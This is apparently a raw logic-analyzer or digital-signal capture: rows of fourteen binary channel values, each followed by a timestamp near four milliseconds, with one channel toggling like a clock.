0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.9614680e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9614920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9615000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9615160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9615400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9615640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9615880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9616160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9616400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9616680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9616920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9617160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9617400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9617640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9617880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9618160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9618400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9618680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9618920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9619160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9619400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9619640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9619880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9620160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9620400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9620680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9620920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9621160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9621400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9621640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9621880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9622160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9622400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9622680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9622920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9623160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9623400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9623640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9623880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9624160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9624400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9624680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9624920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9625160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9625400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9625640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9625880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9626160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9626400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9626680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9626920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9627160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9627400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9627640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9627880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9628160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9628400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9628680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9628920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9629160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9629400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9629640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9629880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9630160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9630400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9630680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9630920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9631160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9631400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9631640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9631880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9632160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9632400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9632680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9632920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9633160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9633400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9633640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9633880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9634160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9634400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9634680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9634920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9635160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9635400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9635640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9635880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9636160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9636400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9636680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9636920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9637160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9637400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9637640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9637880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9638160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9638400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9638680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9638920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9639160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9639400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9639640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9639880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9640160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9640400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9640680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9640920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9641160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9641400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9641680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9641960e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9642160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9642400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9642680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9642920e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9642960e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,1,4.0890280e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,1,4.0892760e-03 1,1,1,1,0,1,0,0,0,1,0,1,0,1,4.0893080e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,1,4.0893320e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,1,4.0896440e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,1,4.0896680e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,1,4.0896760e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,1,4.0896920e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,1,4.0897240e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,1,4.0897440e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,1,4.0897680e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,1,4.0897960e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,1,4.0898200e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,1,4.0898440e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,1,4.0898680e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,1,4.0898920e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0899240e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0899440e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0899680e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0899960e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0900200e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0900280e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,4.0900440e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0900680e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0900760e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0900960e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0901200e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0901240e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,4.0901720e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0901960e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0902040e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0902200e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0902440e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0902680e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0902960e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0903160e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0903440e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0903680e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0903960e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0904440e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0904680e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0905200e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0905440e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0905960e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0906200e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0906680e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0906920e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0907160e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0907440e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0907680e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0907960e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,4.0908440e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0908680e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0908760e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0908920e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0909160e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0909720e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0909960e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0910440e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0910680e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0911200e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0911440e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0911680e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0911960e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0912200e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0912440e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0912920e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0913160e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0913240e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,4.0913680e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0914040e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0914520e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0914760e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0915240e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0915480e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0915720e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0916040e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0916280e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0916480e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0916760e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0917000e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0917240e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0917480e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0917720e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0917960e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0918280e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0918480e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0919000e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0919240e-03 1,1,1,1,0,0,0,0,0,1,0,0,0,0,4.0919280e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0919320e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,4.0919480e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0919720e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0919800e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0919960e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0920280e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0920480e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0920760e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0921240e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0921480e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0921720e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0921960e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0922520e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0922760e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0923320e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0923560e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0924040e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0924320e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0924560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0924840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0925080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0925320e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0925560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0925800e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0926040e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0926280e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0926560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0926840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0927080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0927320e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0927560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0927800e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0928040e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0928320e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0928560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0928800e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0929080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0929320e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0929360e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,4.0929560e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0929800e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0929880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0930040e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0930280e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0930360e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,4.0930840e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0931080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0931160e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0931320e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0931560e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0931800e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0932040e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0932320e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0932560e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0932840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0933080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0933560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0933800e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0934320e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0934560e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0935080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0935320e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0935800e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0936040e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0936320e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0936560e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0936840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0937080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0937560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0937800e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0937880e-03 1,1,1,1,0,1,0,0,0,1,0,0,1,0,4.0938320e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0938560e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0938640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0939080e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0939320e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0939800e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0940040e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0940320e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0940560e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0940800e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0941080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0941320e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0941560e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0941800e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0942120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0942360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0942600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0942840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0943120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0943360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0943640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0943880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0944120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0944360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0944600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0944840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0945120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0945360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0945600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0946120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0946360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0946840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0947120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0947640e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0947880e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0948360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0948600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0948840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0949120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0949360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0949640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0949880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0950120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0950600e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0950840e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0951360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0951640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0952120e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0952360e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0952840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0953120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0953360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0953640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0953880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0954120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0954360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0954600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0954840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0955120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0955360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0955640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0955880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0956120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0956360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0956600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0956840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0957120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0957360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0957600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0957880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0958120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0958360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0958600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0958840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0959080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0959360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0959640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0959840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0960120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0960360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0960600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0960840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0961120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0961360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0961640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0961840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0962120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0962360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0962600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0962840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0963120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0963360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0963600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0963840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0964120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0964360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0964600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0964840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0965080e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0965360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0965640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0965840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0966120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0966360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0966600e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0966840e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0967120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0967360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0967640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0967880e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0968120e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0968360e-03 1,1,1,1,0,0,0,0,0,0,0,0,0,0,4.0968640e-03 1,1,1,1,0,0,0,0,0,0,0,0,1,0,4.0968880e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,0,4.0969160e-03 1,1,1,1,0,1,0,0,0,1,0,0,0,1,4.2209960e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,1,4.2211760e-03 0,0,0,0,0,1,0,0,0,1,0,0,0,1,4.2211800e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,4.2211960e-03 0,0,0,0,1,1,0,0,0,1,0,1,0,1,4.2212200e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,4.2212440e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,1,4.2215600e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,4.2215840e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,4.2215880e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,1,4.2216080e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,4.2216360e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,1,4.2216600e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,4.2216840e-03 